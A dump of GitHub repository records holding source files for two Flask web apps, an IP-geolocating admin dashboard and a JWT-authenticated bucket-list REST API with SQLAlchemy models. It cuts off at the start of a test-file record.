form.validate_on_submit():\n admin_id = current_user.id\n admin = Admin.query.get(int(admin_id))\n admin.password = generate_password_hash(form.password.data)\n admin.is_pw_changed = True\n db.session.commit()\n return redirect(url_for('admin_dashboard'))\n return render_template('admin/reset_password.html', form=form)\n\n# Logout View\[email protected]('/admin/logout')\ndef admin_logout():\n logout_user()\n return redirect(url_for('admin_login'))\n\n\ndef get_loc_by_ip(ip):\n handler = ipinfo.getHandler(app.config['IPINFO_TOKEN'])\n data = handler.getDetails(ip)\n if data is not None:\n location = data.loc.split(\",\")\n marker = { \"lat\": float(location[0]), \"lng\": float(location[1]), \"infobox\": ip }\n return marker\n else:\n return None"
},
{
"alpha_fraction": 0.7084941864013672,
"alphanum_fraction": 0.7104247212409973,
"avg_line_length": 20.58333396911621,
"blob_id": "beb1f24ff8bf4b1ef8f2364717f36cb9ec28c34c",
"content_id": "ec8ea3f8303c77049295310f489a7e4f542bcf7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 518,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 24,
"path": "/settings.py",
"repo_name": "abhijeet-001/flask_app",
"src_encoding": "UTF-8",
"text": "# Secret Key\nSECRET_KEY = \"YOUR_SECRET_KEY\"\n\n# Defines App's mode \n# True or False\nDEBUG = False\n\n# Database Credentials\nDB_USER = \"YOUR_DB_USER\"\nDB_PASSWORD = \"YOUR_DB_PASSWORD\"\nHOST = \"YOUR_DB_HOST\"\nDB_NAME = \"YOUR_DB_NAME\"\n\n# SQLAlchemy Database URL\nSQLALCHEMY_DATABASE_URI = \"postgresql+psycopg2://\"+DB_USER+\":\"+DB_PASSWORD+\"@\"+HOST+\"/\"+DB_NAME\n\n# Set Warning to False\nSQLALCHEMY_TRACK_MODIFICATIONS = False\n\n# Google Map API Key\nGOOGLEMAPS_KEY = 'YOUR_GOOGLEMAPS_KEY'\n\n# Ipinfo Token\nIPINFO_TOKEN = 'YOUR_IPINFO_TOKEN'\n"
},
{
"alpha_fraction": 0.4868154227733612,
"alphanum_fraction": 0.6977687478065491,
"avg_line_length": 16,
"blob_id": "65051311722149f148642c22e01a6a0a7bac36e1",
"content_id": "24ac48695c328aeff97ac259e7e0f5f4a7356428",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 493,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 29,
"path": "/requirements.txt",
"repo_name": "abhijeet-001/flask_app",
"src_encoding": "UTF-8",
"text": "bcrypt==3.1.7\ncachetools==4.0.0\ncertifi==2019.11.28\ncffi==1.13.2\nchardet==3.0.4\nClick==7.0\nFlask==1.1.1\nFlask-Bcrypt==0.7.1\nFlask-GoogleMaps==0.2.6\nFlask-Login==0.4.1\nFlask-SQLAlchemy==2.4.1\nFlask-WTF==0.14.2\ngunicorn==20.0.4\nidna==2.8\nipinfo==3.0.0\nitsdangerous==1.1.0\nJinja2==2.10.3\nMarkupSafe==1.1.1\npasslib==1.7.2\npsycopg2==2.8.4\npycparser==2.19\npython-dotenv==0.10.3\nrequests==2.22.0\nsix==1.13.0\nSQLAlchemy==1.3.12\nSQLAlchemy-Utils==0.36.1\nurllib3==1.25.7\nWerkzeug==0.16.0\nWTForms==2.2.1\n"
},
{
"alpha_fraction": 0.7242798209190369,
"alphanum_fraction": 0.7311385273933411,
"avg_line_length": 32.181819915771484,
"blob_id": "ba6b895777b3fa2e0aa7db97cafe09079c32cbf1",
"content_id": "fa4c0cb28bcd28ee7e340eb99ad3a478d8463066",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 729,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 22,
"path": "/models.py",
"repo_name": "abhijeet-001/flask_app",
"src_encoding": "UTF-8",
"text": "from datetime import datetime\nfrom main import db, login_manager\nfrom sqlalchemy_utils import EmailType\nfrom flask_login import UserMixin\n\n# Define Models\n\n@login_manager.user_loader\ndef load_admin(admin_id):\n return Admin.query.get(int(admin_id))\n\nclass Request(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n ip_address = db.Column(db.String(40))\n date_created = db.Column(db.DateTime, default=datetime.now)\n\nclass Admin(db.Model, UserMixin):\n id = db.Column(db.Integer, primary_key=True)\n email = db.Column(EmailType)\n password = db.Column(db.String(200), nullable=False)\n is_fresh_login = db.Column(db.Boolean, default=True )\n date_created = db.Column(db.DateTime, default=datetime.now())"
},
{
"alpha_fraction": 0.7490842342376709,
"alphanum_fraction": 0.7509157657623291,
"avg_line_length": 41.07692337036133,
"blob_id": "05d63a5751063fc0bc3ab02c77a738953e04b2b8",
"content_id": "8a340367c284c8bed2019a15a659a4045ef74345",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 546,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 13,
"path": "/forms.py",
"repo_name": "abhijeet-001/flask_app",
"src_encoding": "UTF-8",
"text": "# Forms\n\nfrom flask_wtf import Form\nfrom wtforms import StringField, PasswordField\nfrom wtforms.validators import DataRequired, Email, EqualTo, Length\n\nclass LoginForm(Form):\n email = StringField('Email', validators=[DataRequired(), Email()])\n password = PasswordField('Password', validators=[DataRequired()])\n\nclass ResetPasswordForm(Form):\n password = PasswordField('Password', validators=[DataRequired(), Length(min=8)])\n confirm_password = PasswordField('Confirm Password', validators=[DataRequired(), EqualTo('password')])"
},
{
"alpha_fraction": 0.7121211886405945,
"alphanum_fraction": 0.7121211886405945,
"avg_line_length": 27.314285278320312,
"blob_id": "109ecb39263d451c67fe8de4125901adec5446d8",
"content_id": "80caf44b9650d5d9b43068895dc302af763e49d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 990,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 35,
"path": "/cli.py",
"repo_name": "abhijeet-001/flask_app",
"src_encoding": "UTF-8",
"text": "from main import app, db\nfrom models import Admin\nimport click\nfrom werkzeug.security import generate_password_hash\n\n# Defines Custom Commands\n\[email protected](name='migrate')\ndef migrate():\n # Create Table\n db.create_all()\n click.echo('Migrated Successfully!')\n\napp.cli.add_command(migrate)\n\[email protected](name='resetdb')\ndef resetdb():\n db.drop_all()\n click.echo('Database reseted successfully')\n\napp.cli.add_command(resetdb)\n\[email protected](name='createsuperuser')\[email protected](\"email\")\ndef createsuperuser(email):\n check_email = Admin.query.filter(Admin.email == email).first()\n if check_email is not None:\n click.echo('Email already exists. Please try with another email.')\n else:\n admin = Admin(email=email, password=generate_password_hash('admin'))\n db.session.add(admin)\n db.session.commit()\n click.echo('Superuser created successfully! & default password set to \"admin\"')\n\napp.cli.add_command(createsuperuser)"
},
{
"alpha_fraction": 0.7543103694915771,
"alphanum_fraction": 0.7543103694915771,
"avg_line_length": 18.91428565979004,
"blob_id": "0d0f7795dd03f04f50ca8a72d537a23952b89845",
"content_id": "93577abc149397a5969d45101f37db4f61b9e7f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 696,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 35,
"path": "/main.py",
"repo_name": "abhijeet-001/flask_app",
"src_encoding": "UTF-8",
"text": "# Import Packages\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_wtf.csrf import CSRFProtect\nfrom flask_login import LoginManager\nfrom flask_googlemaps import GoogleMaps\n\n# Define app\napp = Flask(__name__)\n\n# Setting App configuration\napp.config.from_pyfile(\"settings.py\")\n\n# Setting up db\ndb = SQLAlchemy(app)\n\n# Setting up csrf\ncsrf = CSRFProtect(app)\n\n# Setting up login manager\nlogin_manager = LoginManager(app)\n# Set Admin Login URL for redirection\nlogin_manager.login_view = 'admin_login'\n\n# Initializing Google App\nGoogleMaps(app)\n\n\n# Import views\nfrom views import *\nfrom models import Request, Admin\nfrom cli import *\n\nif __name__ == \"__main__\":\n app.run()"
}
] | 7 |
WinstonKamau/FLASK_API
|
https://github.com/WinstonKamau/FLASK_API
|
5b047c7c852a716cfeac336cb3b36c4ad55f0163
|
c4fd61f86060ff047984e115e932b1bc1460bd47
|
cb447eba88b5847cbadda2c7051862bcf26e22df
|
refs/heads/master
| 2021-01-16T18:33:09.354247 | 2018-02-15T04:03:57 | 2018-02-15T04:03:57 | 100,089,470 | 0 | 0 | null | 2017-08-12T04:41:06 | 2017-08-25T12:02:15 | 2018-02-15T04:03:57 |
Python
|
[
{
"alpha_fraction": 0.6218045353889465,
"alphanum_fraction": 0.62556391954422,
"avg_line_length": 38.58333206176758,
"blob_id": "3c5280bbb51dd11abdd834fe7d93e552d2157eef",
"content_id": "f08fb56e40d40f36a4997afcd762bdb473dfb2a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6650,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 168,
"path": "/app/models.py",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "'''A module for communicating with the database that creates tables for\nusers, bucketlists and activities'''\nimport os\n\nfrom datetime import datetime, timedelta\nimport jwt\nfrom flask import current_app\nfrom flask_bcrypt import Bcrypt\nfrom app import db\n\n\n\nclass User(db.Model):\n '''A class that creates an instance of a user , saves, deletes and\n modifies it into tables that store the data\n '''\n #table for users\n __usertable__ = 'users'\n #id for a user\n id = db.Column(db.Integer, primary_key=True)\n #nullable set to False because it is required\n #Unique is set to True as two users cannot have the same email\n user_email = db.Column(db.String(300), nullable=False, unique=True)\n user_password = db.Column(db.String(300), nullable=False)\n bucketlists = db.relationship('BucketList',\n order_by='BucketList.id',\n cascade='all, delete-orphan')\n\n def __init__(self, user_email, user_password):\n '''A method for initialising the user with an email and a password that has been hashed\n inorder to prevent storing password in plain text which could be accessed through brute\n force approaches\n '''\n self.user_email = user_email\n #the decode method is a python 3 language specific method for using utf-8\n #Calls the Bycrypt object method to generate a hashed password\n self.user_password = Bcrypt().generate_password_hash(user_password).decode()\n\n def save_user(self):\n '''A method for adding a user to the database'''\n db.session.add(self)\n db.session.commit()\n\n @staticmethod\n def create_encoded_token(user_id):\n '''A method to create a token based on the id of the user and encode it to send\n to the clients server\n '''\n try:\n #A payload with the attribute for the subject of the user's id\n payload = {\n 'exp': datetime.utcnow() +timedelta(minutes=60),\n 'sub': user_id,\n 'iat': datetime.utcnow()\n }\n #Creating a json web token encoded with the algorithm HMAC SHA-256 algorithm\n json_web_token = jwt.encode(payload,\n current_app.config.get('SECRET'),\n algorithm='HS256'\n )\n return json_web_token\n\n except Exception as the_exception_generated:\n #A method to return any exception raised in the try block above\n return str(the_exception_generated)\n\n @staticmethod\n def decode_token_to_sub(token_received):\n '''A method for decoding the token provided back to a user id\n that can be used to get information for the specific user\n '''\n try:\n splitted_header = token_received.split(' ')\n token = splitted_header[1]\n payload = jwt.decode(token, current_app.config.get('SECRET'))\n return payload['sub']\n except jwt.ExpiredSignatureError:\n return \"10 minutes passed, your token has expired\"\n except jwt.InvalidTokenError:\n return 'Register and login to allow valid token'\n\n def password_confirm(self, user_password):\n '''A method for comparing the password entered to the password already stored in hash\n format. 
The method returns True if the password match or False if they do not\n '''\n return Bcrypt().check_password_hash(self.user_password, user_password)\n\n\nclass BucketList(db.Model):\n '''A class that creates an instance of a bucket list, saves a bucketlist\n deletes a bucket list and modifies bucket list to the database\n '''\n #The table for the bucketlist with the variable name __buckettable__\n __buckettable__ = 'bucketlists'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(255))\n date_created = db.Column(db.DateTime, default=db.func.current_timestamp())\n date_modified = db.Column(db.DateTime, default=db.func.current_timestamp(),\n onupdate=db.func.current_timestamp())\n creator_id = db.Column(db.Integer, db.ForeignKey(User.id))\n activities = db.relationship('Activities',\n order_by='Activities.id',\n cascade='all, delete-orphan')\n\n def __init__(self, name, creator_id):\n '''Initialising the bucket list with a name and the user's id'''\n self.name = name\n self.creator_id = creator_id\n\n def save_bucket(self):\n '''A method to save the bucket'''\n db.session.add(self)\n db.session.commit()\n\n def delete_bucket(self):\n '''A method to delete the bucket'''\n db.session.delete(self)\n db.session.commit()\n\n @staticmethod\n def read_bucket(user_id):\n '''A method to return the bucket list in one query'''\n return BucketList.query.all(creator_id=user_id)\n\n def __repr__(self):\n '''A method that repesents the object instance of the model whenever it queries'''\n return \"Bucketlist: {}>\".format(self.name)\n\n\nclass Activities(db.Model):\n '''A class that creates an instance of an activity, saves an activity,\n deletes an activity in the database\n '''\n #table for the activities with the activity name activities\n __activitylist__ = \"activities\"\n\n id = db.Column(db.Integer, primary_key=True)\n activity_name = db.Column(db.String(300))\n date_created = db.Column(db.DateTime, default=db.func.current_timestamp())\n date_modified = db.Column(db.DateTime, default=db.func.current_timestamp(),\n onupdate=db.func.current_timestamp())\n bucket_id = db.Column(db.Integer, db.ForeignKey(BucketList.id))\n\n\n def __init__(self, activity_name, bucket_id):\n '''initialising the activity name, user's and bucketlist's id'''\n self.activity_name = activity_name\n self.bucket_id = bucket_id\n\n def save_activity(self):\n '''A method to save the activity name'''\n db.session.add(self)\n db.session.commit()\n\n def delete_activity(self):\n '''A method to delete the activity name'''\n db.session.delete(self)\n db.session.commit()\n\n @staticmethod\n def read_activity(activity_id):\n '''A method that reads an activity using its id'''\n return Activities.query.all(activity_id=activity_id)\n\n def __repr__(self):\n '''A method that returns an object instance of Activity whenever it queries'''\n return \"Activities: {}>\".format(self.activity_name)\n"
},
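The token helpers in models.py above (User.create_encoded_token and User.decode_token_to_sub) wrap a plain PyJWT round trip. A short sketch of that round trip, assuming PyJWT 1.5.2 as pinned in this repo's requirements.txt (where jwt.encode returns bytes and jwt.decode needs no algorithms list); the SECRET value and user id are placeholders:

from datetime import datetime, timedelta
import jwt

SECRET = "example-secret"  # stands in for current_app.config.get('SECRET')

# Same claims as create_encoded_token: expiry, subject (the user id), issued-at
payload = {
    "exp": datetime.utcnow() + timedelta(minutes=60),
    "sub": 42,
    "iat": datetime.utcnow(),
}
token = jwt.encode(payload, SECRET, algorithm="HS256")

# The API expects an 'Authorization: Bearer <token>' header; decode_token_to_sub
# splits on the single space and reads the 'sub' claim back out
header = "Bearer " + token.decode()
recovered = jwt.decode(header.split(" ")[1], SECRET)
assert recovered["sub"] == 42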
{
"alpha_fraction": 0.4904552102088928,
"alphanum_fraction": 0.49784472584724426,
"avg_line_length": 46.017818450927734,
"blob_id": "5765a0d3a9dba64515d4e4c0a6ae3102a4f6ec8d",
"content_id": "2d2c59948f4718dcb1412f5c61a2d82c38dfdbc6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21111,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 449,
"path": "/app/__init__.py",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "from flask import request\nfrom flask import jsonify\nfrom flask import abort\nfrom flask import make_response\nfrom flask_api import FlaskAPI\nfrom flask_sqlalchemy import SQLAlchemy\nfrom instance.config import app_configurations\ndb=SQLAlchemy()\n#The import below has to appear after initialisation of db to SQLAlchemy\n#This is because the the extensions uses the db\nfrom .extensions import registration_login_blueprint\n\n\ndef create_app(config_name):\n from app.models import User\n from app.models import BucketList\n from app.models import Activities\n app = FlaskAPI(__name__, instance_relative_config=True)\n app.config.from_object(app_configurations[config_name])\n app.config.from_pyfile('config.py')\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n db.init_app(app)\n \n @app.route('/bucketlists/', methods=['POST', 'GET'])\n def bucketlists():\n '''a method that will save a bucket list if post is chosen, return\n a bucketlist if GET is chosen, the buckest list returned can be\n thinned down by an id'''\n header = request.headers.get('Authorization')\n if not header:\n response = jsonify({\n 'message': 'No authorisation header given'\n })\n return make_response(response), 401 \n if ' ' not in header:\n response= jsonify({\n 'message1': 'A space needs to exist between the Bearer and token.',\n 'message2': 'The authorization should be typed as the example below',\n 'example': 'Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE1MDMzNDUzMjIsInN1YiI6MiwiaWF0IjoxNTAzMzQxNzIyfQ.fCZ3ibX-vHQ5SKxYbrarQ0I8lvq5TgMt03A5vGlGhDE\"'\n })\n return make_response(response), 401\n user_id = User.decode_token_to_sub(header)\n if not isinstance (user_id, int):\n response = {\n 'message': 'User id returned is not an int',\n 'userid': user_id\n }\n return make_response(jsonify(response)), 401\n \n\n if request.method == \"POST\":\n if 'name' not in request.data.keys():\n response = jsonify ({\n 'message': 'The key variable name has not been entered!'\n })\n return make_response(response), 400\n name = str(request.data.get('name', ''))\n status_of_similarity = False\n bucketlists_to_be_checked = BucketList.query.filter_by(creator_id=user_id)\n for item in bucketlists_to_be_checked:\n if name.lower() == item.name.lower():\n status_of_similarity = True \n if not status_of_similarity:\n bucket_object = BucketList(name=name, creator_id=user_id)\n bucket_object.save_bucket()\n response = jsonify({\n 'id': bucket_object.id,\n 'name': bucket_object.name,\n 'date_created': bucket_object.date_created,\n 'date_modified': bucket_object.date_modified,\n 'creator_id': user_id\n })\n return make_response(response), 201\n else:\n response = jsonify ({\n 'message': 'A bucket list exists with a similar name of {}!'.format(name)\n })\n return make_response(response), 409\n \n else:\n bucket_name_to_search = request.args.get('q')\n limit_to_return = request.args.get('limit')\n no_argument_given = request.args\n if bucket_name_to_search == '':\n response = jsonify({\n 'message': 'The search parameter has no string in it'\n })\n return make_response(response), 400\n elif bucket_name_to_search:\n bucketlist_list = BucketList.query.filter_by(creator_id = user_id) \n buckets = []\n for item in bucketlist_list:\n if bucket_name_to_search.lower() in item.name.lower():\n a_bucket_object = {\n 'id': item.id,\n 'name': item.name,\n 'date_created': item.date_created,\n 'date_modified': item.date_modified,\n 'creator_id': item.creator_id\n }\n buckets.append(a_bucket_object)\n if len(buckets) > 0 :\n response = jsonify 
(buckets) \n return make_response(response), 200\n else:\n response = jsonify({\n 'message': 'Name does not exist',\n })\n return make_response(response), 200\n elif limit_to_return:\n if int(limit_to_return) > 0:\n bucketlist_list = BucketList.query.filter_by(creator_id=user_id).limit(int (limit_to_return))\n buckets = []\n for item in bucketlist_list:\n a_bucket_object = {\n 'id': item.id,\n 'name': item.name,\n 'date_created': item.date_created,\n 'date_modified': item.date_modified,\n 'creator_id': item.creator_id\n }\n buckets.append(a_bucket_object)\n response = jsonify(buckets)\n return make_response(response), 200\n elif int(limit_to_return) == 0:\n response = jsonify({\n 'message': 'Zero returns no buckets'\n })\n return make_response(response), 200\n else:\n response = jsonify({\n 'message': 'The value entered on limit is not suitable'\n })\n return make_response(response), 400\n elif len(no_argument_given) == 0:\n list_of_bucketlist = BucketList.query.filter_by(creator_id=user_id)\n bucketlist_objects_list = []\n for item in list_of_bucketlist:\n a_bucket_object = {\n 'id': item.id,\n 'name': item.name,\n 'date_created': item.date_created,\n 'date_modified': item.date_modified,\n 'creator_id': item.creator_id,\n }\n bucketlist_objects_list.append(a_bucket_object)\n #converting the bucket list objec into JSON\n response = jsonify(bucketlist_objects_list)\n return make_response(response), 200\n else:\n response = jsonify({\n 'message': 'Wrong route given. Below are the right routes',\n 'GET all bucketlists for user': '/bucketlists/',\n 'search particular bucketlist': '/bucketlists/?q=<name of bucket>',\n 'enter a limt to bucket list returned': 'bucketlsits/?limit=<integer>'\n })\n return make_response(response), 400\n \n @app.route('/bucketlists/<int:id>', methods=['GET', 'PUT', 'DELETE'])\n def bucketlist_manipulation(id, **kwargs):\n '''a method that accepts a variable on its route and converts it into an integer\n which is used in setting it as an id. 
The id allows editing and deleting a\n particular object\n '''\n header = request.headers.get('Authorization')\n if not header:\n response = jsonify({\n 'message': 'No authorisation header given'\n })\n return make_response(response), 401 \n if ' ' not in header:\n response= jsonify({\n 'message1': 'A space needs to exist between the Bearer and token.',\n 'message2': 'The authorization should be typed as the example below',\n 'example': 'Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE1MDMzNDUzMjIsInN1YiI6MiwiaWF0IjoxNTAzMzQxNzIyfQ.fCZ3ibX-vHQ5SKxYbrarQ0I8lvq5TgMt03A5vGlGhDE\"'\n })\n return make_response(response), 401\n user_id = User.decode_token_to_sub(header)\n if not isinstance (user_id, int):\n response = {\n 'message': 'User id returned is not an int',\n 'userid': user_id\n }\n return make_response(jsonify(response)), 401\n bucket_object = BucketList.query.filter_by(id=id, creator_id=user_id).first()\n if not bucket_object:\n return {\n 'message':'The id {} entered does not exist in the bucketlist'.format(id)\n }, 400\n\n if request.method == 'DELETE':\n bucket_object.delete_bucket()\n return {\n \"message\": \"bucketlist {} deleted successfully\".format(bucket_object.id) \n }, 200\n\n elif request.method == 'PUT':\n name = str(request.data.get('name', ''))\n status_of_similarity = False\n if not name:\n response = jsonify ({\n 'message': 'The key variable name has not been entered!'\n })\n return make_response(response), 400\n else:\n bucketlists_to_be_checked = BucketList.query.filter_by(creator_id=user_id)\n for item in bucketlists_to_be_checked:\n if name.lower() == item.name.lower():\n status_of_similarity = True \n if status_of_similarity == False:\n bucket_object.name = name\n bucket_object.save_bucket()\n response = jsonify({\n 'id': bucket_object.id,\n 'name': bucket_object.name,\n 'date_created': bucket_object.date_created,\n 'date_modified': bucket_object.date_modified,\n 'creator_id': bucket_object.creator_id\n })\n return make_response(response), 201\n else:\n response = jsonify ({\n 'message': 'A bucket list exists with a similar name of {}!'.format(name)\n })\n return make_response(response), 409\n else:\n response = jsonify({\n 'id': bucket_object.id,\n 'name': bucket_object.name,\n 'date_created': bucket_object.date_created,\n 'date_modified': bucket_object.date_modified,\n 'creator_id': bucket_object.creator_id\n })\n return make_response(response), 200\n\n\n @app.route('/bucketlists/<int:bucket_id>/items/', methods=['POST', 'GET'])\n def activities(bucket_id):\n header = request.headers.get('Authorization')\n if not header:\n response = jsonify({\n 'message': 'No authorisation header given'\n })\n return make_response(response), 401 \n if ' ' not in header:\n response= jsonify({\n 'message1': 'A space needs to exist between the Bearer and token.',\n 'message2': 'The authorization should be typed as the example below',\n 'example': 'Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE1MDMzNDUzMjIsInN1YiI6MiwiaWF0IjoxNTAzMzQxNzIyfQ.fCZ3ibX-vHQ5SKxYbrarQ0I8lvq5TgMt03A5vGlGhDE\"'\n })\n return make_response(response), 401\n user_id = User.decode_token_to_sub(header)\n if not isinstance (user_id, int):\n response = {\n 'message': 'User id returned is not an int',\n 'userid': user_id\n }\n return make_response(jsonify(response)), 401\n if not BucketList.query.filter_by(creator_id=user_id, id=bucket_id).first():\n response = {\n 'message': 'The bucket id {} entered does not exist for this user'.format(bucket_id)\n }\n return make_response(response), 400\n if 
request.method == 'POST':\n activity_name = str(request.data.get('activity_name', ''))\n if not activity_name:\n response = jsonify ({\n 'message': 'The activity_name key has not been entered therefore the activity has not been created',\n })\n return make_response(response), 400\n activities_to_be_checked = Activities.query.filter_by(bucket_id=bucket_id)\n status_of_similarity = False\n for item in activities_to_be_checked:\n if activity_name.lower() == item.activity_name.lower():\n status_of_similarity = True\n if status_of_similarity == False:\n activity_object = Activities(activity_name=activity_name, bucket_id=bucket_id) \n activity_object.save_activity()\n response = jsonify({\n 'id': activity_object.id,\n 'activity_name': activity_object.activity_name,\n 'date_created': activity_object.date_created,\n 'date_modified': activity_object.date_modified,\n 'bucket_id': activity_object.bucket_id\n })\n return make_response(response), 201\n else:\n response = jsonify({\n 'message': \"An activity already exists with the name {} provided.\".format(activity_name)\n })\n return make_response(response), 409\n \n else:\n search = request.args.get('q')\n limit_to_return = request.args.get('limit')\n no_argument_given = request.args\n if search == '':\n response = jsonify ({\n 'message': 'The search parameter has no string in it'\n })\n return make_response(response), 400\n elif search:\n activities_list = Activities.query.filter_by(bucket_id=bucket_id)\n activity_array = []\n for item in activities_list:\n if search.lower() in item.activity_name.lower():\n activity_object = {\n 'id': item.id,\n 'activity_name': item.activity_name,\n 'date_created': item.date_created,\n 'date_modified': item.date_modified,\n 'bucket_id': item.bucket_id\n }\n activity_array.append(activity_object)\n if len(activity_array) > 0 :\n response = jsonify(activity_array)\n return make_response(response), 200\n else:\n response = jsonify({\n 'message': 'The activity name does not exist'\n }) \n return make_response(response), 200\n elif limit_to_return:\n if int(limit_to_return)>0:\n activities_list = Activities.query.filter_by(bucket_id=bucket_id).limit(int(limit_to_return))\n activity_array = []\n for item in activities_list:\n activity_object = {\n 'id': item.id,\n 'activity_name': item.activity_name,\n 'date_created': item.date_created,\n 'date_modified': item.date_modified,\n 'bucket_id': item.bucket_id\n }\n activity_array.append(activity_object)\n response = jsonify(activity_array)\n return make_response(response), 200\n else:\n response = jsonify({\n 'message': 'Zero returns no item'\n })\n return make_response(response), 200 \n\n elif len(no_argument_given) == 0 :\n activitieslist = Activities.query.filter_by(bucket_id=bucket_id)\n activity_array = []\n for item in activitieslist:\n activity_item = {\n 'id': item.id,\n 'activity_name': item.activity_name,\n 'date_created': item.date_created,\n 'date_modified': item.date_modified,\n 'bucket_id': item.bucket_id \n }\n activity_array.append(activity_item)\n response = jsonify(activity_array)\n return make_response(response), 200\n else:\n response = jsonify({\n 'message': 'Wrong route given. 
Below are the right routes',\n 'GET all items for user': '/bucketlists/<bucket_id>/items/',\n 'search particular item': '/bucketlists/<bucket_id>/items/?q=<name of bucket>',\n 'enter a limt to items returned': 'bucketlsits/<bucket_id>/items/?limit=<integer>'\n })\n return make_response(response), 400\n \n\n @app.route('/bucketlists/<int:bucket_id>/items/<int:activity_id>', methods = ['GET', 'PUT', 'DELETE'])\n def activity_manipulation(bucket_id, activity_id):\n header = request.headers.get('Authorization')\n if not header:\n response = jsonify({\n 'message': 'No authorisation header given'\n })\n return make_response(response), 401 \n if ' ' not in header:\n response= jsonify({\n 'message1': 'A space needs to exist between the Bearer and token.',\n 'message2': 'The authorization should be typed as the example below',\n 'example': 'Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE1MDMzNDUzMjIsInN1YiI6MiwiaWF0IjoxNTAzMzQxNzIyfQ.fCZ3ibX-vHQ5SKxYbrarQ0I8lvq5TgMt03A5vGlGhDE\"'\n })\n return make_response(response), 401\n user_id = User.decode_token_to_sub(header)\n if not isinstance (user_id, int):\n response = {\n 'message': 'User id returned is not an int',\n 'userid': user_id\n }\n return make_response(jsonify(response)), 401\n if not BucketList.query.filter_by(creator_id=user_id, id=bucket_id).first():\n response = {\n 'message': 'The bucket id {} entered does not exist for this user'.format(bucket_id)\n }\n return make_response(response), 400\n activity_object = Activities.query.filter_by(bucket_id=bucket_id, id=activity_id).first()\n if not activity_object:\n response = {\n 'message': 'The actvitiy id {} entered does not exist for this user'.format(activity_id)\n }\n return make_response(response), 400\n if request.method == 'PUT':\n activity_name = request.data['activity_name']\n if not activity_name:\n response = jsonify({\n 'message': 'No key of activity_name was used in replacing'\n }) \n return make_respons(response), 400\n activities_to_be_checked = Activities.query.filter_by(bucket_id=bucket_id)\n status_of_similarity = False\n for item in activities_to_be_checked:\n if activity_name.lower() == item.activity_name.lower():\n status_of_similarity = True\n if status_of_similarity == False:\n activity_object.activity_name = activity_name\n activity_object.save_activity()\n response = jsonify ({\n 'id': activity_object.id,\n 'date_created': activity_object.date_created,\n 'date_modified': activity_object.date_modified,\n 'bucket_id': activity_object.bucket_id,\n 'activity_name': activity_object.activity_name\n })\n return make_response(response), 200\n else:\n response = jsonify({\n 'message': \"An activity already exists with the name {} provided.\".format(activity_name)\n })\n return make_response(response), 409\n \n if request.method == 'DELETE':\n response = jsonify({\n 'message': \"Deleted activity {}\".format(activity_object.id)\n })\n activity_object.delete_activity()\n return make_response(response), 200 \n \n else:\n response = jsonify ({\n 'id': activity_object.id,\n 'date_created': activity_object.date_created,\n 'date_modified': activity_object.date_modified,\n 'bucket_id': activity_object.bucket_id,\n 'activity_name': activity_object.activity_name\n }) \n return make_response(response), 200\n \n \n app.register_blueprint(registration_login_blueprint)\n return app\n"
},
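The view functions above define the full request protocol: register and log in to obtain a token, then send every bucketlist call with an 'Authorization: Bearer <token>' header (the handlers explicitly check for the single space). A client-side sketch using the `requests` library, which is not a dependency of this repo; the base URL and credentials are placeholders, while the 'access-token' response key is the one this repo's test suite reads:

import requests

BASE = "http://localhost:5000"  # hypothetical local server
creds = {"user_email": "user@example.com", "user_password": "password"}

requests.post(BASE + "/auth/register", data=creds)
token = requests.post(BASE + "/auth/login", data=creds).json()["access-token"]
auth = {"Authorization": "Bearer " + token}  # single space, as the handlers require

# POST /bucketlists/ creates a bucket; a duplicate name would return 409
bucket = requests.post(BASE + "/bucketlists/", headers=auth,
                       data={"name": "Travel"}).json()

# GET supports ?q=<name> for substring search and ?limit=<n> to cap the results
print(requests.get(BASE + "/bucketlists/?limit=3", headers=auth).json())

# Items nest under a bucket id
requests.post(BASE + "/bucketlists/{}/items/".format(bucket["id"]),
              headers=auth, data={"activity_name": "Visit Morocco"})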
{
"alpha_fraction": 0.46386221051216125,
"alphanum_fraction": 0.4731789827346802,
"avg_line_length": 58.52941131591797,
"blob_id": "22bea0100fcb89b33726354e0d743f8cdbb24241",
"content_id": "43c430af4af77947d146952c2143eeead8533daf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14168,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 238,
"path": "/tests/test_activity.py",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
